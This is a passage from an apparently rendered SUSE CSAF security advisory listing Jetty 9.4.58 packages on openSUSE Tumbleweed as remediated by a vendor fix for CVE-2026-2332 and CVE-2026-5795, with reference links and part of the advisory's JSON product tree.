Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-project-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-project-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-project-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-project-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-security-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-security-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-security-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-security-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-server-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-server-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-server-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-server-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-start-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-start-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-start-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-start-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-util-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-util-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-util-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-util-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-client-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-client-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-client-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-client-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-http-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-http-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-http-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-http-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-io-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-io-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-io-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-io-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-project-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-project-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-project-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-project-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-security-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-security-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-security-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-security-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-server-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-server-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-server-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-server-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-start-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-start-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-start-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-start-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-util-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-util-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-util-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-util-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
| URL | Category |
|---|---|
| https://www.suse.com/support/security/rating/ | external |
| https://ftp.suse.com/pub/projects/security/csaf/o… | self |
| https://www.suse.com/security/cve/CVE-2026-2332/ | self |
| https://www.suse.com/security/cve/CVE-2026-5795/ | self |
| https://www.suse.com/security/cve/CVE-2026-2332 | external |
| https://bugzilla.suse.com/1262115 | external |
| https://www.suse.com/security/cve/CVE-2026-5795 | external |
| https://bugzilla.suse.com/1261997 | external |
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "jetty-annotations-9.4.58-4.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the jetty-annotations-9.4.58-4.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2026-10574",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_10574-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-2332 page",
"url": "https://www.suse.com/security/cve/CVE-2026-2332/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-5795 page",
"url": "https://www.suse.com/security/cve/CVE-2026-5795/"
}
],
"title": "jetty-annotations-9.4.58-4.1 on GA media",
"tracking": {
"current_release_date": "2026-04-18T00:00:00Z",
"generator": {
"date": "2026-04-18T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:10574-1",
"initial_release_date": "2026-04-18T00:00:00Z",
"revision_history": [
{
"date": "2026-04-18T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "jetty-annotations-9.4.58-4.1.aarch64",
"product": {
"name": "jetty-annotations-9.4.58-4.1.aarch64",
"product_id": "jetty-annotations-9.4.58-4.1.aarch64"
}
},
{
"category": "product_version",
"name": "jetty-ant-9.4.58-4.1.aarch64",
"product": {
"name": "jetty-ant-9.4.58-4.1.aarch64",
"product_id": "jetty-ant-9.4.58-4.1.aarch64"
}
},
{
"category": "product_version",
"name": "jetty-cdi-9.4.58-4.1.aarch64",
"product": {
"name": "jetty-cdi-9.4.58-4.1.aarch64",
"product_id": "jetty-cdi-9.4.58-4.1.aarch64"
}
},
{
"category": "product_version",
"name": "jetty-client-9.4.58-4.1.aarch64",
"product": {
"name": "jetty-client-9.4.58-4.1.aarch64",
"product_id": "jetty-client-9.4.58-4.1.aarch64"
}
},
{
"category": "product_version",
"name": "jetty-continuation-9.4.58-4.1.aarch64",
"product": {
"name": "jetty-continuation-9.4.58-4.1.aarch64",
"product_id": "jetty-continuation-9.4.58-4.1.aarch64"
}
},
{
"category": "product_version",
"name": "jetty-deploy-9.4.58-4.1.aarch64",
"product": {
"name": "jetty-deploy-9.4.58-4.1.aarch64",
"product_id": "jetty-deploy-9.4.58-4.1.aarch64"
}
},
{
"category": "product_version",
"name": "jetty-fcgi-9.4.58-4.1.aarch64",
"product": {
"name": "jetty-fcgi-9.4.58-4.1.aarch64",
"product_id": "jetty-fcgi-9.4.58-4.1.aarch64"
}
},
{
"category": "product_version",
"name": "jetty-http-9.4.58-4.1.aarch64",
"product": {
"name": "jetty-http-9.4.58-4.1.aarch64",
"product_id": "jetty-http-9.4.58-4.1.aarch64"
}
},
{
"category": "product_version",
"name": "jetty-http-spi-9.4.58-4.1.aarch64",
"product": {
"name": "jetty-http-spi-9.4.58-4.1.aarch64",
"product_id": "jetty-http-spi-9.4.58-4.1.aarch64"
}
},
{
"category": "product_version",
"name": "jetty-io-9.4.58-4.1.aarch64",
"product": {
"name": "jetty-io-9.4.58-4.1.aarch64",
"product_id": "jetty-io-9.4.58-4.1.aarch64"
}
},
{
"category": "product_version",
"name": "jetty-jaas-9.4.58-4.1.aarch64",
"product": {
"name": "jetty-jaas-9.4.58-4.1.aarch64",
"product_id": "jetty-jaas-9.4.58-4.1.aarch64"
}
},
{
"category": "product_version",
"name": "jetty-jaspi-9.4.58-4.1.aarch64",
"product": {
"name": "jetty-jaspi-9.4.58-4.1.aarch64",
"product_id": "jetty-jaspi-9.4.58-4.1.aarch64"
}
},
{
"category": "product_version",
"name": "jetty-jmx-9.4.58-4.1.aarch64",
"product": {
"name": "jetty-jmx-9.4.58-4.1.aarch64",
"product_id": "jetty-jmx-9.4.58-4.1.aarch64"
}
},
{
"category": "product_version",
"name": "jetty-jndi-9.4.58-4.1.aarch64",
"product": {
"name": "jetty-jndi-9.4.58-4.1.aarch64",
"product_id": "jetty-jndi-9.4.58-4.1.aarch64"
}
},
{
"category": "product_version",
"name": "jetty-jsp-9.4.58-4.1.aarch64",
"product": {
"name": "jetty-jsp-9.4.58-4.1.aarch64",
"product_id": "jetty-jsp-9.4.58-4.1.aarch64"
}
},
{
"category": "product_version",
"name": "jetty-minimal-javadoc-9.4.58-4.1.aarch64",
"product": {
"name": "jetty-minimal-javadoc-9.4.58-4.1.aarch64",
"product_id": "jetty-minimal-javadoc-9.4.58-4.1.aarch64"
}
},
{
"category": "product_version",
"name": "jetty-openid-9.4.58-4.1.aarch64",
"product": {
"name": "jetty-openid-9.4.58-4.1.aarch64",
"product_id": "jetty-openid-9.4.58-4.1.aarch64"
}
},
{
"category": "product_version",
"name": "jetty-plus-9.4.58-4.1.aarch64",
"product": {
"name": "jetty-plus-9.4.58-4.1.aarch64",
"product_id": "jetty-plus-9.4.58-4.1.aarch64"
}
},
{
"category": "product_version",
"name": "jetty-project-9.4.58-4.1.aarch64",
"product": {
"name": "jetty-project-9.4.58-4.1.aarch64",
"product_id": "jetty-project-9.4.58-4.1.aarch64"
}
},
{
"category": "product_version",
"name": "jetty-proxy-9.4.58-4.1.aarch64",
"product": {
"name": "jetty-proxy-9.4.58-4.1.aarch64",
"product_id": "jetty-proxy-9.4.58-4.1.aarch64"
}
},
{
"category": "product_version",
"name": "jetty-quickstart-9.4.58-4.1.aarch64",
"product": {
"name": "jetty-quickstart-9.4.58-4.1.aarch64",
"product_id": "jetty-quickstart-9.4.58-4.1.aarch64"
}
},
{
"category": "product_version",
"name": "jetty-rewrite-9.4.58-4.1.aarch64",
"product": {
"name": "jetty-rewrite-9.4.58-4.1.aarch64",
"product_id": "jetty-rewrite-9.4.58-4.1.aarch64"
}
},
{
"category": "product_version",
"name": "jetty-security-9.4.58-4.1.aarch64",
"product": {
"name": "jetty-security-9.4.58-4.1.aarch64",
"product_id": "jetty-security-9.4.58-4.1.aarch64"
}
},
{
"category": "product_version",
"name": "jetty-server-9.4.58-4.1.aarch64",
"product": {
"name": "jetty-server-9.4.58-4.1.aarch64",
"product_id": "jetty-server-9.4.58-4.1.aarch64"
}
},
{
"category": "product_version",
"name": "jetty-servlet-9.4.58-4.1.aarch64",
"product": {
"name": "jetty-servlet-9.4.58-4.1.aarch64",
"product_id": "jetty-servlet-9.4.58-4.1.aarch64"
}
},
{
"category": "product_version",
"name": "jetty-servlets-9.4.58-4.1.aarch64",
"product": {
"name": "jetty-servlets-9.4.58-4.1.aarch64",
"product_id": "jetty-servlets-9.4.58-4.1.aarch64"
}
},
{
"category": "product_version",
"name": "jetty-start-9.4.58-4.1.aarch64",
"product": {
"name": "jetty-start-9.4.58-4.1.aarch64",
